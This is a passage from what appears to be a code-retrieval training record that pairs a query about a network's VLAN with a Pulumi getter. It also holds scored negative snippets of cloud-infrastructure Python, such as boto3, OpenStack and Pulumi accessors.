self._ipv6_vip_virsubnet_id = None\n self._ipv6_vip_port_id = None\n self._availability_zone_list = None\n self._enterprise_project_id = None\n self._l4_flavor_id = None\n self._l4_scale_flavor_id = None\n self._l7_flavor_id = None\n self._l7_scale_flavor_id = None\n self._publicips = None\n self._elb_virsubnet_ids = None\n self._elb_virsubnet_type = None\n self._ip_target_enable = None\n self._deletion_protection_enable = None\n self._frozen_scene = None\n self._ipv6_bandwidth = None\n self.discriminator = None\n\n self.id = id\n self.description = description\n self.provisioning_status = provisioning_status\n self.admin_state_up = admin_state_up\n self.provider = provider\n self.pools = pools\n self.listeners = listeners\n self.operating_status = operating_status\n self.vip_address = vip_address\n self.vip_subnet_cidr_id = vip_subnet_cidr_id\n self.name = name\n self.project_id = project_id\n self.vip_port_id = vip_port_id\n self.tags = tags\n self.created_at = created_at\n self.updated_at = updated_at\n self.guaranteed = guaranteed\n self.vpc_id = vpc_id\n self.eips = eips\n self.ipv6_vip_address = ipv6_vip_address\n self.ipv6_vip_virsubnet_id = ipv6_vip_virsubnet_id\n self.ipv6_vip_port_id = ipv6_vip_port_id\n self.availability_zone_list = availability_zone_list\n if enterprise_project_id is not None:\n self.enterprise_project_id = enterprise_project_id\n self.l4_flavor_id = l4_flavor_id\n self.l4_scale_flavor_id = l4_scale_flavor_id\n self.l7_flavor_id = l7_flavor_id\n self.l7_scale_flavor_id = l7_scale_flavor_id\n if publicips is not None:\n self.publicips = publicips\n if elb_virsubnet_ids is not None:\n self.elb_virsubnet_ids = elb_virsubnet_ids\n if elb_virsubnet_type is not None:\n self.elb_virsubnet_type = elb_virsubnet_type\n if ip_target_enable is not None:\n self.ip_target_enable = ip_target_enable\n if deletion_protection_enable is not None:\n self.deletion_protection_enable = deletion_protection_enable\n self.frozen_scene = frozen_scene\n if ipv6_bandwidth is not None:\n self.ipv6_bandwidth = ipv6_bandwidth",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def test_list_virt_realms_in_cloud(self):\n pass",
"def ip_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]]:\n return pulumi.get(self, \"ip_whitelists\")",
"def ip_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]]:\n return pulumi.get(self, \"ip_whitelists\")",
"def ListResourceTags(self, ResourceId):\n\n Client = boto3.client('kms')\n \n response = Client.list_resource_tags (\n KeyId = ResourceId\n\t)\n\n return response",
"def get_all_virtual_machines(app_id=None):\n url = ''\n if app_id is not None:\n url += 'appliance_id=%s' % str(app_id)\n if len(url) > 0:\n url = '?' + url\n return atmosphere.tools.create_req(url=url)",
"def list_vm_template(client, private_cloud, resource_pool, location):\n return client.list(private_cloud, location, resource_pool)",
"def service_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def get_instance_list():\n return parse_list_output(Popen('nova list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])",
"def _validate_resources(self):\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )",
"def vios_uuids(self):\n raise NotImplementedError()",
"def list_instances(self, label_filters: Optional[dict] = None) -> List[\"GCPNode\"]:\n return",
"def tags(self):\n return ['HostRoles/component_name', \\\n 'HostRoles/host_name', \\\n 'HostRoles/cluster_name']",
"def test_get_virtualization_realms(self):\n pass",
"def get_all_vulnerable_vm_id(self, vm_id: str) -> List[str]:\n if not self._validated:\n raise VmAttackServiceSetUpException('First you should call \"set_cloud_environment\" successfully')\n\n # Find this vm index\n attacker_vm_index = self._get_vm_index(vm_id)\n\n # Go through the graph\n indexes = self._get_all_accessible_vertex_from_index(attacker_vm_index)\n\n # Return only vm ids\n return [self._vms[index]['vm_id'] for index in indexes]",
"def metric_labels_allowlist(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"metric_labels_allowlist\")",
"def list_vnics(client, resource_group_name, vm_name):\n virtual_machine = client.get(resource_group_name, vm_name)\n return virtual_machine.nics",
"def get_vehicle_variables_list(self):\n return self.get('vehicles/GetVehicleVariableList')",
"def vmss(resource: dict) -> dict:\n cleanse = [\n \"properties\", \"instances\"\n ]\n\n return __cleanse(cleanse, resource)",
"def source_instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"source_instance_ids\")",
"def source_instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"source_instance_ids\")",
"def microvm(self):\n return self._context.get(\"microvm\", None)",
"def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"resource_labels\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def valve_name_list(self):\n return list(self._link_reg.valve_names)",
"def list_nodes(self):\n nodes = self.nodes\n result = []\n for i_node in self.iapi.node.list():\n if i_node.name:\n name = i_node.name\n else:\n # Sometimes Ironic does not show the names, pull them from Nova if possible.\n selected_nova_node = None\n for nova_node in nodes:\n if getattr(\n nova_node, 'OS-EXT-SRV-ATTR:hypervisor_hostname', None) == i_node.uuid:\n selected_nova_node = nova_node\n break\n if selected_nova_node:\n name = selected_nova_node.name\n else:\n name = None\n result.append(Node(i_node.uuid, name, i_node.power_state, i_node.provision_state))\n return result",
"def list_instances(self):\n LOG.debug(\"list_instances\")\n\n instance_ids = []\n bmms = db.bmm_get_all(None)\n for bmm in bmms:\n if not bmm[\"instance_id\"]:\n continue\n instance_ids.append(self._instance_id_to_name(bmm[\"instance_id\"]))\n\n return instance_ids",
"def cpu_ids() -> List[int]:\n api_file = open('/sys/devices/system/cpu/present', 'r')\n\n cpu_id_tmp = re.findall('\\d+|-', api_file.readline().strip())\n cpu_id_list = []\n for i in range(len(cpu_id_tmp)):\n if cpu_id_tmp[i] == '-':\n for cpu_id in range(int(cpu_id_tmp[i - 1]) + 1, int(cpu_id_tmp[i + 1])):\n cpu_id_list.append(int(cpu_id))\n else:\n cpu_id_list.append(int(cpu_id_tmp[i]))\n return cpu_id_list",
"def test_get_hyperflex_feature_limit_external_list(self):\n pass",
"def _minimal_vlist(self):\n vlist = list()\n if self.dataset_id == \"phy\" or self.dataset_id == \"bgc\":\n plist = [\n \"data_mode\",\n \"latitude\",\n \"longitude\",\n \"position_qc\",\n \"time\",\n \"time_qc\",\n \"direction\",\n \"platform_number\",\n \"cycle_number\",\n \"config_mission_number\",\n \"vertical_sampling_scheme\",\n ]\n [vlist.append(p) for p in plist]\n\n plist = [\"pres\", \"temp\", \"psal\"]\n if self.dataset_id == \"bgc\":\n plist = [\"pres\", \"temp\", \"psal\", \"doxy\"]\n [vlist.append(p) for p in plist]\n [vlist.append(p + \"_qc\") for p in plist]\n [vlist.append(p + \"_adjusted\") for p in plist]\n [vlist.append(p + \"_adjusted_qc\") for p in plist]\n [vlist.append(p + \"_adjusted_error\") for p in plist]\n\n elif self.dataset_id == \"ref\":\n plist = [\"latitude\", \"longitude\", \"time\", \"platform_number\", \"cycle_number\"]\n [vlist.append(p) for p in plist]\n plist = [\"pres\", \"temp\", \"psal\", \"ptmp\"]\n [vlist.append(p) for p in plist]\n\n return vlist",
"def list_local_devices():\n def _convert(pb_str):\n m = device_attributes_pb2.DeviceAttributes()\n m.ParseFromString(pb_str)\n return m\n return [_convert(s) for s in pywrap_tensorflow.DeviceFactory_AddDevices()]",
"def monitor_nodes(self) -> List[str]:\n return self._monitor_nodes.copy()",
"def inverter_list(self, plant_id):\n warnings.warn(\"This function may be deprecated in the future because naming is not correct, use device_list instead\", DeprecationWarning)\n return self.device_list(plant_id)",
"def tunables(self):\n return base_64_to_object(self.tunable_hyperparameters_64)",
"def vulnerability_ids():\n\n if S3VulnerabilityModel.indicator_pids is None:\n db = current.db\n table = db.vulnerability_indicator\n rows = db(table.deleted == False).select(table.parameter_id)\n S3VulnerabilityModel.indicator_pids = [i.parameter_id for i in rows]\n\n return S3VulnerabilityModel.indicator_pids",
"def ListTags(self, ResourceId):\n \n Client = boto3.client(self.Service) \n\n if self.Service == 's3':\n response = Client.list_tags (\n Bucket = ResourceId\n\t )\n elif self.Service == 'es':\n response = Client.list_tags (\n ARN = ResourceId\n\t )\n elif self.Service == 'cloudtrail':\n response = Client.list_tags (\n ResourceIdList = [\n ResourceId\n\t\t]\n\t )\n elif self.Service == 'sagemaker':\n response = Client.list_tags (\n ResourceArn = ResourceId\n\t )\n elif self.Service == 'dax':\n response = Client.list_tags (\n ResourceName = ResourceId\n\t )\n elif self.Service == 'lambda':\n response = Client.list_tags (\n Resource = ResourceId\n\t )\n else:\n raise TagNotSupportedError(self.Service)\n \n return response",
"def list(self, filters: dict = None, state: str = None, exclude: str = None) -> list:\n date_format = '%Y-%m-%d %H:%M:%S'\n self.instances = self.ec2.instances.all()\n\n # TOREMOVE\n def __all_instances():\n # all instances without filtering\n self.instances = [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]\n\n if state:\n try:\n self.instances = self.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': [state]}])\n except IOError as e:\n raise EC2Error('Error listing instances by state {0} {1}'.format(state, e))\n\n if filters:\n # convert string into dict\n filters = literal_eval(filters)\n try:\n if not self.instances:\n self.instances = self.ec2.instances.all()\n\n self.instances = self.instances.filter(Filters=[{'Name': filters['Name'], 'Values': filters['Values']}])\n except IOError as e:\n raise EC2Error('Error listing instances with filters {0} {1}'.format(filters, e))\n\n if exclude:\n instances = []\n for i in self.instances:\n if i.id not in exclude:\n instances.append(i)\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in instances\n ]\n else:\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]",
"def get_instances() -> dict:\n url = f\"{app.config['COMPUTE_SERVERS_REF']}/detail\"\n instances_rq = request(\n method=\"GET\", url=url, headers=build_header(), params={\"vm_state\": \"active\"},\n )\n\n if not instances_rq.ok:\n HTTPError(instances_rq.status_code)\n\n answer = {\"servers\": list()}\n for instance in instances_rq.json()[\"servers\"]:\n instance_info = dict(name=instance[\"name\"])\n instance_info[\"ip_addresses\"] = list()\n for network, info in instance[\"addresses\"].items():\n instance_info[\"ip_addresses\"].extend(entry[\"addr\"] for entry in info)\n answer[\"servers\"].append(instance_info)\n\n return answer",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def test_get_hyperflex_feature_limit_internal_list(self):\n pass",
"def machine_lookup_all(session, hostname, public_ip = True):\n client = session.client('ec2')\n response = client.describe_instances(Filters=[{\"Name\":\"tag:Name\", \"Values\":[hostname]},\n {\"Name\":\"instance-state-name\", \"Values\":[\"running\"]}])\n\n addresses = []\n items = response['Reservations']\n if len(items) > 0:\n for i in items:\n item = i['Instances'][0]\n if 'PublicIpAddress' in item and public_ip:\n addresses.append(item['PublicIpAddress'])\n elif 'PrivateIpAddress' in item and not public_ip:\n addresses.append(item['PrivateIpAddress'])\n return addresses",
"def list_instances(self):\n instances = utils.list_instances(self.compute_client,\n drv_conf.resource_group)\n\n self._uuid_to_omni_instance.clear()\n instance_names = []\n for instance in instances:\n openstack_id = None\n if instance.tags and 'openstack_id' in instance.tags:\n openstack_id = instance.tags['openstack_id']\n if openstack_id is None:\n openstack_id = self._get_uuid_from_omni_id(instance.name)\n self._uuid_to_omni_instance[openstack_id] = instance\n instance_names.append(instance.name)\n return instance_names",
"def lv_devices(self):\n devs = set()\n return devs",
"def init_cloud_virtual_resources():\n test_cldvirt_resources = []\n\n # add info to list in memory, one by one, following signature values\n cldvirtres_ID = 1\n cldvirtres_name = \"nova-compute-1\"\n cldvirtres_info = \"nova VM in Arm pod\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [1,3]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n cldvirtres_ID = 2\n cldvirtres_name = \"nova-compute-2\"\n cldvirtres_info = \"nova VM in LaaS\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [2,3]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n cldvirtres_ID = 3\n cldvirtres_name = \"nova-compute-3\"\n cldvirtres_info = \"nova VM in x86 pod\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [1]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n\n # write list to binary file\n write_list_bin(test_cldvirt_resources, FILE_CLOUD_RESOURCES)\n\n return test_cldvirt_resources",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
"def __init__(self, **kwargs):\n\n super(NUVM, self).__init__()\n\n # Read/Write Attributes\n \n self._l2_domain_ids = None\n self._vrsid = None\n self._uuid = None\n self._name = None\n self._last_updated_by = None\n self._reason_type = None\n self._delete_expiry = None\n self._delete_mode = None\n self._resync_info = None\n self._site_identifier = None\n self._interfaces = None\n self._enterprise_id = None\n self._enterprise_name = None\n self._entity_scope = None\n self._domain_ids = None\n self._compute_provisioned = None\n self._zone_ids = None\n self._orchestration_id = None\n self._user_id = None\n self._user_name = None\n self._status = None\n self._subnet_ids = None\n self._external_id = None\n self._hypervisor_ip = None\n \n self.expose_attribute(local_name=\"l2_domain_ids\", remote_name=\"l2DomainIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"vrsid\", remote_name=\"VRSID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"uuid\", remote_name=\"UUID\", attribute_type=str, is_required=True, is_unique=False)\n self.expose_attribute(local_name=\"name\", remote_name=\"name\", attribute_type=str, is_required=True, is_unique=False)\n self.expose_attribute(local_name=\"last_updated_by\", remote_name=\"lastUpdatedBy\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"reason_type\", remote_name=\"reasonType\", attribute_type=str, is_required=False, is_unique=False, choices=[u'BLOCKED_LAST', u'BLOCKED_UNKNOWN', u'CRASHED_LAST', u'CRASHED_UNKNOWN', u'NOSTATE_LAST', u'NOSTATE_UNKNOWN', u'PAUSED_DUMP', u'PAUSED_FROM_SNAPSHOT', u'PAUSED_IOERROR', u'PAUSED_LAST', u'PAUSED_MIGRATION', u'PAUSED_SAVE', u'PAUSED_SHUTTING_DOWN', u'PAUSED_UNKNOWN', u'PAUSED_USER', u'PAUSED_WATCHDOG', u'RUNNING_BOOTED', u'RUNNING_FROM_SNAPSHOT', u'RUNNING_LAST', u'RUNNING_MIGRATED', u'RUNNING_MIGRATION_CANCELED', u'RUNNING_RESTORED', u'RUNNING_SAVE_CANCELED', u'RUNNING_UNKNOWN', u'RUNNING_UNPAUSED', u'SHUTDOWN_LAST', u'SHUTDOWN_UNKNOWN', u'SHUTDOWN_USER', u'SHUTOFF_CRASHED', u'SHUTOFF_DESTROYED', u'SHUTOFF_FAILED', u'SHUTOFF_FROM_SNAPSHOT', u'SHUTOFF_LAST', u'SHUTOFF_MIGRATED', u'SHUTOFF_SAVED', u'SHUTOFF_SHUTDOWN', u'SHUTOFF_UNKNOWN', u'UNKNOWN'])\n self.expose_attribute(local_name=\"delete_expiry\", remote_name=\"deleteExpiry\", attribute_type=int, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"delete_mode\", remote_name=\"deleteMode\", attribute_type=str, is_required=False, is_unique=False, choices=[u'TIMER'])\n self.expose_attribute(local_name=\"resync_info\", remote_name=\"resyncInfo\", attribute_type=dict, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"site_identifier\", remote_name=\"siteIdentifier\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"interfaces\", remote_name=\"interfaces\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"enterprise_id\", remote_name=\"enterpriseID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"enterprise_name\", remote_name=\"enterpriseName\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"entity_scope\", remote_name=\"entityScope\", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])\n self.expose_attribute(local_name=\"domain_ids\", remote_name=\"domainIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"compute_provisioned\", remote_name=\"computeProvisioned\", attribute_type=bool, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"zone_ids\", remote_name=\"zoneIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"orchestration_id\", remote_name=\"orchestrationID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"user_id\", remote_name=\"userID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"user_name\", remote_name=\"userName\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"status\", remote_name=\"status\", attribute_type=str, is_required=False, is_unique=False, choices=[u'BLOCKED', u'CRASHED', u'DELETE_PENDING', u'INIT', u'LAST', u'NOSTATE', u'PAUSED', u'RUNNING', u'SHUTDOWN', u'SHUTOFF', u'UNKNOWN', u'UNREACHABLE'])\n self.expose_attribute(local_name=\"subnet_ids\", remote_name=\"subnetIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"external_id\", remote_name=\"externalID\", attribute_type=str, is_required=False, is_unique=True)\n self.expose_attribute(local_name=\"hypervisor_ip\", remote_name=\"hypervisorIP\", attribute_type=str, is_required=False, is_unique=False)\n \n\n # Fetchers\n \n \n self.vm_resyncs = NUVMResyncsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.alarms = NUAlarmsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.vm_interfaces = NUVMInterfacesFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.vrss = NUVRSsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.event_logs = NUEventLogsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n\n self._compute_args(**kwargs)",
"def video_list(self) -> list:\n return self._video_list",
"def Get_Running_Instances():\n ec2 = boto3.resource('ec2') \n #call the features resource from the boto3 library\n instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['pending', 'running',]},])\n #filter the instances returned using the state name\n #you can also filter using Tags by adding the filters: \n #[{'Name': 'tag-key', 'Values': ['Role','Name',]}, {'Name': 'tag-value', 'Values': ['*test*', '*TEST*',]},]\n return [instance.id for instance in instances]\n #return a liste with the ids of the instances",
"def describe_storage_virtual_machines(self, storage_virtual_machine_ids):\n result = []\n missed_storage_virtual_machine_ids = []\n for storage_virtual_machine_id in storage_virtual_machine_ids:\n cached_data = self.svm_cache.get(storage_virtual_machine_id)\n if cached_data:\n result.append(cached_data)\n else:\n missed_storage_virtual_machine_ids.append(storage_virtual_machine_id)\n if missed_storage_virtual_machine_ids:\n response = self._client.describe_storage_virtual_machines(\n StorageVirtualMachineIds=missed_storage_virtual_machine_ids\n )[\"StorageVirtualMachines\"]\n for storage_virtual_machine in response:\n self.svm_cache[storage_virtual_machine.get(\"StorageVirtualMachineId\")] = storage_virtual_machine\n result.append(storage_virtual_machine)\n return result",
"def dedicated_resources(self) -> Optional[Sequence['outputs.AiEndpointDeployedModelDedicatedResource']]:\n return pulumi.get(self, \"dedicated_resources\")",
"def external_ips(self) -> Iterable[dto.ExternalIp]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_))"
] | [
"0.5911471",
"0.5848252",
"0.5473489",
"0.5471283",
"0.54288316",
"0.54288316",
"0.542811",
"0.5384369",
"0.53598607",
"0.53279454",
"0.53103167",
"0.53008413",
"0.5270152",
"0.5221629",
"0.5212279",
"0.5154512",
"0.51520634",
"0.5138587",
"0.5093057",
"0.50420386",
"0.50042206",
"0.4995383",
"0.49669278",
"0.49644408",
"0.4937803",
"0.4937803",
"0.4933031",
"0.49263301",
"0.49022365",
"0.4853191",
"0.4848545",
"0.48418877",
"0.48418877",
"0.48182926",
"0.4800245",
"0.4790401",
"0.47575775",
"0.47556743",
"0.47541535",
"0.47490764",
"0.47478598",
"0.47465527",
"0.47450772",
"0.47440666",
"0.4727466",
"0.47250164",
"0.47250164",
"0.47215536",
"0.47202095",
"0.47202095",
"0.47168332",
"0.47152784",
"0.47058794",
"0.46962467",
"0.46910205",
"0.46598512",
"0.4625184",
"0.46175116",
"0.46113682",
"0.4605691",
"0.4604954",
"0.4602646",
"0.46026215",
"0.45959505",
"0.45871922",
"0.45841774",
"0.45841774",
"0.4584045",
"0.45753127",
"0.45743778",
"0.45743778",
"0.45669588",
"0.45638353",
"0.45604417",
"0.45580888",
"0.4554763",
"0.45497242",
"0.45493203",
"0.4539019",
"0.45336145",
"0.45323297",
"0.45290163",
"0.45277873",
"0.45269412",
"0.4519519",
"0.4518747",
"0.4516422",
"0.45126343",
"0.45113605",
"0.45113406",
"0.45097977",
"0.45077255",
"0.45073253",
"0.45005122",
"0.44970864",
"0.44890028",
"0.4486892",
"0.44849727",
"0.44799265"
] | 0.55128694 | 2 |
The VLAN from the l3IsolationDomain that is used for this network. | def vlan(self) -> pulumi.Output[float]:
return pulumi.get(self, "vlan") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def vlan(self) :\n\t\ttry :\n\t\t\treturn self._vlan\n\t\texcept Exception as e:\n\t\t\traise e",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetVlanTag', self.handle)",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetVlanTag', self.handle)",
"def vlan(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"vlan\")",
"def get_vlan(self, vlan_id):\r\n return self.vlan.getObject(id=vlan_id, mask=DEFAULT_VLAN_MASK)",
"def VlanId(self):\n if self.force_auto_sync:\n self.get('VlanId')\n return self._VlanId",
"def multicast_vlan(self):\n if self.segment.multicast_vlan_policy == \"d\":\n return None\n elif self.segment.multicast_vlan_policy == \"e\":\n return self.segment.multicast_vlan\n else:\n return self.segment.profile.multicast_vlan",
"def vlanChoice(self):\r\n idx = self.m_shuffleSeq[self.m_Cnt]\r\n self._vlanChoice = self.m_vlanSeq[idx]\r\n self.m_Cnt = (self.m_Cnt + 1) % self._wrMaxLen\r\n return self._vlanChoice",
"def management_vlan(self):\n if self.segment.management_vlan_policy == \"d\":\n return None\n elif self.segment.management_vlan_policy == \"e\":\n return self.segment.management_vlan\n else:\n return self.segment.profile.management_vlan",
"def InnerVlanId(self):\n if self.force_auto_sync:\n self.get('InnerVlanId')\n return self._InnerVlanId",
"def FlowStatVlanId(self):\n\t\treturn self._get_attribute('flowStatVlanId')",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def _extract_vlan(vlan):\n try:\n return re.match(r'vlan-(\\d+)', vlan).group(1)\n except:\n return None",
"def VlanPriority(self):\n if self.force_auto_sync:\n self.get('VlanPriority')\n return self._VlanPriority",
"def vlans(self):\n if self._vlans is None:\n self._vlans = self._show_vlan()\n\n return self._vlans",
"def FlowStatVlanPriority(self):\n\t\treturn self._get_attribute('flowStatVlanPriority')",
"def vlan_get(self, vlan_id):\n # return True/False\n raise NotImplementedError",
"def get_vlan_from_int(dev, int_name):\n return dev.get_interfaces()[int_name]",
"def show_vlan(self, vlan=None, vdc=None):\n for vdcname in vdc:\n print \"VDC: {}\".format(vdcname)\n if vlan is not None and vlan in self.vdcs[vdcname].get_vlans_list():\n print self.vdcs[vdcname].vlans[vlan]\n else:\n for v in self.vdcs[vdcname].vlans:\n print self.vdcs[vdcname].vlans[v]",
"def get_vnet_subnet_id(self) -> Union[str, None]:\n return self.agentpool_context.get_vnet_subnet_id()",
"def FlowAggregatedStatVlanId(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanId')",
"def build(cls, name, enc, networkcfg):\n static = (networkcfg[name] if name in networkcfg\n else networkcfg[networkcfg.default_section])\n vlan = VLAN(name, enc, static)\n if vlan.policy == 'untagged':\n return UntaggedPolicy(vlan)\n elif vlan.policy == 'tagged':\n return TaggedPolicy(vlan)\n elif vlan.policy == 'transit':\n return TransitPolicy(vlan)\n elif vlan.policy == 'ipmi':\n return IPMIPolicy(vlan)\n elif vlan.policy == 'puppet':\n raise RuntimeError(\n 'should never been called with \"puppet\" policy', vlan)\n raise ValueError(\n 'unknown network policy for VLAN {}'.format(vlan.name),\n vlan.policy)",
"def lan_address(self):\n return self._lan_address",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n return self._current_dev_manager.read_mac_address_vlan(vid=vid)",
"def tempest_cinder_glance_swift_vlan(self):\n self.helper_cinder_glance_swift('vlan')",
"def get_switch_local_vlan_id(self, rpc_context, **kwargs):\n port_id = kwargs.get('port_id')\n host_name = kwargs.get('host_name')\n if self.rpc_handler is None:\n return\n context = {'port_id': str(port_id), 'host_name': str(host_name)}\n\n response = None\n try:\n response = self.rpc_handler.get_switch_local_vlan_id(context)\n except:\n pass\n return response",
"def virtual_network_subnet_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n raise NotImplementedError",
"def set_vlan_tag(self, nVlanTag):\n\t\tcall_sdk_function('PrlVirtNet_SetVlanTag', self.handle, nVlanTag)",
"def vm_vlan_num_in(self, vm_vlan_num_in):\n\n self._vm_vlan_num_in = vm_vlan_num_in",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def add_vlan(self, vlan):\n logger.info('adding vlan: %s' % vlan.name)\n data = self._add_common(vlan)\n logger.debug('vlan data: %s' % data)\n self.interface_data[vlan.name] = data\n if vlan.routes:\n self._add_routes(vlan.name, vlan.routes)",
"def vz0(self):\n return self.params['vz0']",
"def FlowAggregatedStatVlanPriority(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanPriority')",
"def read_port_vlan_info(self, port: int) -> Vlans:\n return self._current_dev_manager.read_port_vlan_info(port=port)",
"def get_ifvlan_index(self, ifvlan_id):\n index = -1\n for i in range(len(info_populator.InfoPopulator.IFVLAN_IDS)):\n if ifvlan_id == info_populator.InfoPopulator.IFVLAN_IDS[i]:\n index = i\n break\n else:\n self.fail(\n \"could not find the index of interface vlan: %s\" %\n ifvlan_id)\n\n return index",
"def _getvlanlistqos(self):\n self.activeL2 = []\n for _key, vals in self.activeDeltas.get('output', {}).get('vsw', {}).items():\n if self.hostname not in vals:\n continue\n if not self._started(vals):\n # This resource has not started yet. Continue.\n continue\n for key, vals1 in vals[self.hostname].items():\n self.activeL2.append({'destport': key,\n 'vlan': vals1.get('hasLabel', {}).get('value', ''),\n 'params': vals1.get('hasService', {})})",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
